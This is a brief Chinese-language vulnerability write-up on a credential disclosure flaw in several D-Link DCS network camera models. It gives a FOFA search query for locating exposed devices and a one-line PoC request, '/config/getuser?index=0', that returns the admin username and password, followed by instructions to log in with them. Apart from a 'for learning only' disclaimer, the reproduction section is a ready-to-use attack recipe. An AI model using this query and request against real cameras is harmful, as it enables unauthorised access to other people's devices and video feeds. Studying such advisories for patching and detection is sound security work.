0x01 前言
本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!
0x02 漏洞描述
D-link DCS是一款成像色彩为彩色 是一款网络摄像机。D-link DCS系统存在密码泄露漏洞,攻击者通过漏洞可以获取后台权限。
0x03 受影响版本
DCS-2530L
DCS-2670L
DCS-4603
DCS-4622等多个DCS系列系统
0x04 漏洞复现
fofa:app="D_Link-DCS-型号"
POC
/config/getuser?index=0
1.使用poc进行账号密码查看,得到密码登录即可
/config/getuser?index=0
2.得到的账号密码直接登录即可